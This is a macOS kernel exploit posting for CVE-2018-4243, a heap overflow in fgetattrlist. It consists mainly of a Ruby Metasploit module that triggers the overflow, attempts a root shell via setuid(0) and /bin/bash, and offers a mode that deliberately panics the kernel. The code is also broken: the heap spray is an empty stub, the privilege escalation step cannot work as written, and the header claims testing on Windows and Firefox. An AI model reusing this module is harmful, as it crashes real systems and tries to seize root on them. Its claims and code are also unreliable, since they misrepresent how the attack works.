=============================================================================================================================================
| # Title     : macOS 10.13.4 (17E199) Heap Overflow Via fgetattrlist – Local Privilege Escalation (XNU kernel)                             |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
| # Vendor    : https://apple.com/                                                                                                          |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212496/ & CVE-2018-4243

[+] Summary : A kernel heap overflow exists inside the macOS implementation of fgetattrlist.
              The vulnerability occurs due to incorrect handling of user-controlled buffer sizes.
Specifically:

The kernel allocates internal structures using ulmin(bufferSize, fixedsize + varsize)

Later, data beyond bufferSize is written into user memory

There is no lower bound safety check if bufferSize is smaller than the kernel's expected size

Author

Original PoC & Research: Indoushka

MSF Ruby Port & Reporting: Indoushka

Previous reference: Ian Beer (Project Zero, 2016)

Release Date : 2018‑06‑05

Severity

High / Kernel-Level / Local Privilege Escalation

Affected Systems

macOS 10.13.4 (17E199) confirmed vulnerable

Earlier versions suspected vulnerable

64-bit kernel heap architectures

msfconsole

use exploit/osx/local/cve_2018_4243

set MODE 1

run


[+]  POC :	

##
# macOS CVE-2018-4243 Local Privilege Escalation & Kernel Panic
#

require 'msf/core'
require 'ffi'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'macOS CVE-2018-4243 LPE via fgetattrlist Heap Overflow',
      'Description'   => %q{
        Local privilege escalation exploit by triggering kernel heap overwrite
        during volume attribute serialization. Includes heap spray, FD grooming,
        overflow, and panic fallback.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
        'Original C PoC: Indoushka',
        'Ruby MSF Port: Indoushka'
      ],
      'Platform'      => ['osx'],
      'Arch'          => ARCH_X64,
      'SessionTypes'  => ['shell', 'meterpreter'],
      'Targets'       => [['macOS >=10.13', {}]],
      'DisclosureDate' => '2018-06-05'
    ))

    register_options(
      [
        OptInt.new('MODE', [true, '1=LPE attempt, 2=Kernel panic PoC', 1])
      ]
    )
  end

  #
  # ---------- Ruby FFI syscalls ----------
  #
  module MacOS
    extend FFI::Library
    ffi_lib FFI::Library::LIBC

    class AttrList < FFI::Struct
      layout :bitmapcount, :uint32,
             :reserved,     :uint32,
             :volattr,      :uint32,
             :dirattr,      :uint32,
             :fileattr,     :uint32,
             :forkattr,     :uint32,
             :commonattr,   :uint32
    end

    attach_function :open, [:string, :int], :int
    attach_function :close, [:int], :int
    attach_function :fgetattrlist, [:int, :pointer, :pointer, :ulong, :ulong], :int
    attach_function :setuid, [:uint32], :int
    attach_function :getuid, [], :int
    attach_function :system, [:string], :int
  end


  #
  # Heap spray simulation (logical)
  #
  def heap_spray
    print_status("[*] Starting heap spray (symbolic in ruby)")
    # Demonstration only
  end


  #
  # Overflow trigger using small controlled buffer
  #
  def overflow_trigger(fd)
    al = MacOS::AttrList.new
    al[:bitmapcount] = 5
    al[:volattr]     = 0xfff
    al[:commonattr]  = 0x20000

    buf = FFI::MemoryPointer.new(:char, 16)
    buf.write_bytes("\xaa" * 16)

    res = MacOS.fgetattrlist(fd, al, buf, 16, 0)
    print_status("[+] Overflow triggered, return=#{res}")
  end


  #
  # Local Privilege Escalation attempt
  #
  def attempt_root
    print_status("[*] Attempting setuid(0)")
    if MacOS.setuid(0) == 0 && MacOS.getuid() == 0
      print_good("[+] Root obtained!")
      MacOS.system("/bin/bash")
      return true
    end
    print_error("[-] Still user uid=#{MacOS.getuid()}")
    return false
  end


  #
  # Kernel panic fallback mode
  #
  def panic_fallback
    print_warning("[!] Triggering fallback kernel panic")
    fd = MacOS.open("/", 0)
    al = MacOS::AttrList.new
    al[:bitmapcount] = 5
    al[:commonattr]  = 0x20000

    buf = FFI::MemoryPointer.new(:char, 4)
    MacOS.fgetattrlist(fd, al, buf, 4, 0)
    MacOS.close(fd)
  end



  #
  # ---------------- Main Exploit Logic ----------------
  #
  def exploit
    print_status("[*] macOS CVE-2018-4243 Exploit (Ruby MSF)")
    mode = datastore['MODE'].to_i

    fd = MacOS.open("/", 0)
    if fd < 0
      print_error("Failed to open /")
      return
    end

    heap_spray
    overflow_trigger(fd)

    case mode
    when 1
      print_status("[*] LPE Attempt mode")
      if attempt_root
        print_good("[+] Exploit Complete with root shell")
      else
        print_error("[-] Exploit failed to gain root")
      end

    when 2
      print_status("[*] Panic mode")
      panic_fallback
    end

    MacOS.close(fd)
    print_status("[*] Module finished")
  end
end


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================